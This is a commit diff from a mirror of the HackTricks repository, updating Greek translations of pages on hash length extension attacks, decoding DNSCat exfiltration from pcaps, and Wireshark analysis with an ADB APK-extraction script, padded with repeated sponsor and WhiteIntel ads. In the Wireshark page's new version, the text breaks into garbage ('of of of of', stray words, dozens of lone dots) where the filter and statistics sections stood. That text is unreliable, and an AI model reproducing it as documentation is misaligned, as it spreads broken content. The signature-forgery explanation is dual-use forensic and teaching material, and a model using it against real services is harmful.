mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi
This commit is contained in:
parent
7567dcc38b
commit
dba3d22560
34 changed files with 2151 additions and 1260 deletions
|
@ -1,42 +1,55 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
# Περίληψη της επίθεσης
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Φανταστείτε ένα διακομιστή που **υπογράφει** κάποια **δεδομένα** προσθέτοντας ένα **μυστικό** σε κάποια γνωστά καθαρά δεδομένα και στη συνέχεια κατακερματίζοντας αυτά τα δεδομένα. Εάν γνωρίζετε:
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
* **Το μήκος του μυστικού** (αυτό μπορεί επίσης να ανακαλυφθεί με βίαιη δοκιμή από έναν δεδομένο εύρος μήκους)
|
||||
* **Τα καθαρά δεδομένα**
|
||||
* **Τον αλγόριθμο (και τον ευάλωτο σε αυτήν την επίθεση)**
|
||||
* **Το παραμόρφωμα είναι γνωστό**
|
||||
* Συνήθως χρησιμοποιείται ένα προεπιλεγμένο, οπότε αν πληρούνται και οι άλλες 3 απαιτήσεις, αυτό επίσης ισχύει
|
||||
* Το παραμόρφωμα διαφέρει ανάλογα με το μήκος του μυστικού+δεδομένων, γι' αυτό χρειάζεται το μήκος του μυστικού
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Τότε, είναι δυνατό για έναν **επιτιθέμενο** να **προσθέσει** **δεδομένα** και να **δημιουργήσει** μια έγκυρη **υπογραφή** για τα **προηγούμενα δεδομένα + προσθεμένα δεδομένα**.
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
# Σύνοψη της επίθεσης
|
||||
|
||||
Φανταστείτε ένα διακομιστή που **υπογράφει** κάποια **δεδομένα** με το **προσάρτημα** ενός **μυστικού** σε κάποια γνωστά δεδομένα καθαρού κειμένου και στη συνέχεια κατακερματίζει αυτά τα δεδομένα. Αν γνωρίζετε:
|
||||
|
||||
* **Το μήκος του μυστικού** (αυτό μπορεί επίσης να αναγνωριστεί με βρόχο από ένα δεδομένο εύρος μήκους)
|
||||
* **Τα δεδομένα καθαρού κειμένου**
|
||||
* **Τον αλγόριθμο (και την ευπάθειά του σε αυτήν την επίθεση)**
|
||||
* **Το padding είναι γνωστό**
|
||||
* Συνήθως χρησιμοποιείται ένα προεπιλεγμένο, οπότε αν πληρούνται τα άλλα 3 απαιτήσεις, αυτό επίσης είναι
|
||||
* Το padding διαφέρει ανάλογα με το μήκος του μυστικού+δεδομένων, γι' αυτό χρειάζεται το μήκος του μυστικού
|
||||
|
||||
Τότε, είναι δυνατό για έναν **εισβολέα** να **προσαρτήσει** **δεδομένα** και να **δημιουργήσει** ένα έγκυρο **υπογραφή** για τα **προηγούμενα δεδομένα + τα προσαρτημένα δεδομένα**.
|
||||
|
||||
## Πώς;
|
||||
|
||||
Βασικά, οι ευάλωτοι αλγόριθμοι δημιουργούν τα κατακερματισμένα δεδομένα αρχικά κατακερματίζοντας ένα μπλοκ δεδομένων και στη συνέχεια, από το προηγούμενο δημιουργημένο κατακερματισμένο δεδομένο (κατάσταση), προσθέτουν το επόμενο μπλοκ δεδομένων και το κατακερματίζουν.
|
||||
Βασικά, οι ευάλωτοι αλγόριθμοι δημιουργούν τα κατακερματισμένα δεδομένα αρχικά με το **κατακερματισμό ενός τμήματος δεδομένων**, και στη συνέχεια, **από** το **προηγούμενα** δημιουργημένο **κατακερματισμένο δεδομένο** (κατάσταση), **προσθέτουν το επόμενο τμήμα δεδομένων** και το **κατακερματίζουν**.
|
||||
|
||||
Έπειτα, φανταστείτε ότι το μυστικό είναι "μυστικό" και τα δεδομένα είναι "δεδομένα", το MD5 του "μυστικόδεδομένα" είναι 6036708eba0d11f6ef52ad44e8b74d5b.\
|
||||
Εάν ένας επιτιθέμενος θέλει να προσθέσει τον χαρακτήρα "προσθήκη" μπορεί:
|
||||
Στη συνέχεια, φανταστείτε ότι το μυστικό είναι "μυστικό" και τα δεδομένα είναι "δεδομένα", το MD5 του "μυστικόδεδομένα" είναι 6036708eba0d11f6ef52ad44e8b74d5b.\
|
||||
Αν ένας εισβολέας θέλει να προσαρτήσει τη συμβολοσειρά "προσάρτημα" μπορεί:
|
||||
|
||||
* Να δημιουργήσει ένα MD5 από 64 "Α"
|
||||
* Να αλλάξει την κατάσταση του προηγουμένως αρχικοποιημένου κατακερματισμένου δεδομένου σε 6036708eba0d11f6ef52ad44e8b74d5b
|
||||
* Να προσθέσει τον χαρακτήρα "προσθήκη"
|
||||
* Να ολοκληρώσει τον κατακερματισμό και το αποτέλεσμα θα είναι μια **έγκυρη υπογραφή για το "μυστικό" + "δεδομένα" + "παραμόρφωμα" + "προσθήκη"**
|
||||
* Να αλλάξει την κατάσταση του προηγουμένως αρχικοποιημένου κατακερματισμένου σε 6036708eba0d11f6ef52ad44e8b74d5b
|
||||
* Να προσαρτήσει τη συμβολοσειρά "προσάρτημα"
|
||||
* Να ολοκληρώσει τον κατακερματισμό και το αποτέλεσμα θα είναι μια **έγκυρη για το "μυστικό" + "δεδομένα" + "padding" + "προσάρτημα"** υπογραφή
|
||||
|
||||
## **Εργαλείο**
|
||||
|
||||
|
@ -46,15 +59,28 @@
|
|||
|
||||
Μπορείτε να βρείτε αυτήν την επίθεση καλά εξηγημένη στο [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -12,10 +12,23 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
Εάν έχετε pcap με δεδομένα που **εξαφανίζονται από το DNSCat** (χωρίς κρυπτογράφηση), μπορείτε να βρείτε το εξαφανισμένο περιεχόμενο.
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Χρειάζεστε μόνο να γνωρίζετε ότι τα **πρώτα 9 bytes** δεν είναι πραγματικά δεδομένα, αλλά σχετίζονται με την **επικοινωνία C\&C**:
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
Αν έχετε ένα αρχείο pcap με δεδομένα που **εξαγάγονται από το DNSCat** (χωρίς χρήση κρυπτογράφησης), μπορείτε να βρείτε το εξαγόμενο περιεχόμενο.
|
||||
|
||||
Χρειάζεστε μόνο να γνωρίζετε ότι τα **πρώτα 9 bytes** δεν είναι πραγματικά δεδομένα αλλά σχετίζονται με τη **επικοινωνία C\&C**:
|
||||
```python
|
||||
from scapy.all import rdpcap, DNSQR, DNSRR
|
||||
import struct
|
||||
|
@ -38,20 +51,20 @@ last = qry
|
|||
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
|
||||
|
||||
|
||||
Υπάρχει ένα σενάριο που λειτουργεί με Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
||||
```
|
||||
Υπάρχει ένα script που λειτουργεί με Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
||||
```bash
|
||||
python3 dnscat_decoder.py sample.pcap bad_domain
|
||||
```
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,83 +4,105 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>κάντε μάθημα στο χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE</strong></a><strong> (HackTricks AWS Red Team Expert)</strong>!</summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass3.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας στο χάκινγκ υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας στο χάκινγκ υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## Βελτιώστε τις δεξιότητες σας στο Wireshark
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βελτιώστε τις δεξιότητές σας στο Wireshark
|
||||
|
||||
### Οδηγοί
|
||||
|
||||
Οι παρακάτω οδηγοί είναι εκπληκτικοί για να μάθετε μερικά ψυχαγωγικά βασικά κόλπα:
|
||||
Οι ακόλουθοι οδηγοί είναι εκπληκτικοί για να μάθετε μερικά δροσερά βασικά κόλπα:
|
||||
|
||||
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
|
||||
|
||||
### Αναλυμένες πληροφορίες
|
||||
### Αναλυμένες Πληροφορίες
|
||||
|
||||
**Ειδικές πληροφορίες**
|
||||
**Ειδικές Πληροφορίες**
|
||||
|
||||
Κάνοντας κλικ στο _**Ανάλυση** --> **Ειδικές πληροφορίες**_ θα έχετε μια **επισκόπηση** του τι συμβαίνει στα αναλυμένα πακέτα:
|
||||
Κάνοντας κλικ σε _**Ανάλυση** --> **Ειδικές Πληροφορίες**_ θα έχετε μια **επισκόπηση** του τι συμβαίνει στα **αναλυμένα** πακέτα:
|
||||
|
||||
![](<../../../.gitbook/assets/image (570).png>)
|
||||
|
||||
**Επιλυμένες διευθύνσεις**
|
||||
**Επιλυμένες Διευθύνσεις**
|
||||
|
||||
Στο _**Στατιστικά --> Επιλυμένες διευθύνσεις**_ μπορείτε να βρείτε πολλές πληροφορίες που έχουν "**επιλυθεί**" από το wireshark, όπως θύρα/μεταφορά σε πρωτόκολλο, MAC στον κατασκευαστή, κλπ. Είναι ενδιαφέρον να γνωρίζετε τι εμπλέκεται στην επικοινωνία.
|
||||
Κάτω από _**Στατιστικά --> Επιλυμένες Διευθύνσεις**_ μπορείτε να βρείτε πολλές **πληροφορίες** που έχουν "**επιλυθεί**" απένας όπως θύρα/μεταφορά σε πρωτόκολλ historians. Sm.
|
||||
|
||||
![](<../../../.gitbook/assets/image (571).png>)
|
||||
of of of of of of of .
|
||||
|
||||
**Ιεραρχία πρωτοκόλλων**
|
||||
.
|
||||
|
||||
Στο _**Στατιστικά --> Ιεραρχία πρωτοκόλλων**_ μπορείτε να βρείτε τα **πρωτόκολλα** που εμπλέκονται στην επικοινωνία και πληροφορίες για αυτά.
|
||||
.
|
||||
|
||||
![](<../../../.gitbook/assets/image (572).png>)
|
||||
.
|
||||
|
||||
**Συνομιλίες**
|
||||
.
|
||||
|
||||
Στο _**Στατιστικά --> Συνομιλίες**_ μπορείτε να βρείτε ένα **σύνολο πληροφοριών για τις συνομιλίες** στην επικοινωνία και πληροφορίες για αυτές.
|
||||
.
|
||||
|
||||
![](<../../../.gitbook/assets/image (573).png>)
|
||||
.
|
||||
|
||||
**Σημεία άφιξης**
|
||||
.
|
||||
|
||||
Στο _**Στατιστικά --> Σημεία άφιξης**_ μπορείτε να βρείτε ένα **σύνολο πληροφοριών για τα σημεία άφιξης** στην επικοινωνία και πληροφορίες για καθένα από αυτά.
|
||||
.
|
||||
|
||||
![](<../../../.gitbook/assets/image (575).png>)
|
||||
.
|
||||
|
||||
**Πληροφορίες DNS**
|
||||
.
|
||||
|
||||
Στο _**Στατιστικά --> DNS**_ μπορείτε να βρείτε στατιστικά σχετικά με τα καταγεγραμμένα αιτήματα DNS.
|
||||
.
|
||||
|
||||
![](<../../../.gitbook/assets/image (577).png>)
|
||||
.
|
||||
|
||||
**Διάγραμμα I/O**
|
||||
.
|
||||
|
||||
Στο _**Στατιστικά --> Διάγραμμα I/O**_ μπορείτε να βρείτε ένα **διάγραμμα της επικοινωνίας**.
|
||||
.
|
||||
|
||||
![](<../../../.gitbook/assets/image (574).png>)
|
||||
.
|
||||
|
||||
### Φίλτρα
|
||||
.
|
||||
|
||||
Εδώ μπορείτε να βρείτε φίλτρα wireshark ανάλογα με το πρωτόκολλο: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
|
||||
Άλλα ενδιαφέροντα φίλτρα:
|
||||
.
|
||||
|
||||
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
|
||||
* Κίνηση HTTP και αρχική κίνηση HTTPS
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
|
||||
* Κίνηση HTTP και αρχική κίνηση HTTPS + TCP SYN
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and
|
||||
.
|
||||
|
||||
.
|
||||
|
||||
.
|
||||
|
||||
.
|
||||
|
||||
.
|
||||
|
||||
.
|
||||
## ADB επικοινωνία
|
||||
|
||||
Εξαγωγή ενός APK από μια ADB επικοινωνία όπου το APK στάλθηκε:
|
||||
```python
|
||||
from scapy.all import *
|
||||
|
||||
|
@ -107,16 +129,28 @@ f = open('all_bytes.data', 'w+b')
|
|||
f.write(all_bytes)
|
||||
f.close()
|
||||
```
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στη διεύθυνση:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
